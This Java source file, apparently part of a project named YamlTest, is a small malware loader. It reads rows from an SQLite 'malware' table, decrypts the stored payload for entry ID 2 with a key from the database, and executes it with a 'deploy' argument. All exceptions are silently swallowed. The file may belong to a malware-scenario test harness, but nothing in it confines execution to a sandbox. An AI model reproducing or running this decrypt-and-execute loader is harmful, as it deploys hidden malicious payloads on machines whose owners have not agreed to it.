/*
 * This Java source file was generated by the Gradle 'init' task.
 */
package YamlTest;

import java.io.File;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;

import database.SqliteDatabase;
import scenarios.ScenarioHelper;

public class Library {

	public static void main(String[] args) {

		ScenarioHelper sch = new ScenarioHelper();

		SqliteDatabase sqliteDB = new SqliteDatabase("filesDb.sqlite");
		sqliteDB.createMalwareTable();
		sqliteDB.createScenariosTable();

		String sql = "SELECT * FROM malware";

		try (Connection conn = sqliteDB.connect();
				Statement stmt = conn.createStatement();
				ResultSet rs = stmt.executeQuery(sql)) {

			while (rs.next()) {
				System.out.println("ID: " + rs.getInt("idNumber"));
				if (rs.getInt("idNumber") == 2) {
					File tempFile = sch.convertBytesToFile(rs.getBytes("dMalware"));
					sqliteDB.getSecretKey().decryptFile(tempFile);
					sch.executeFile(tempFile, "c++", "deploy");
				} else {

				}
			}
		} catch (Exception e) {

		}
	}

}
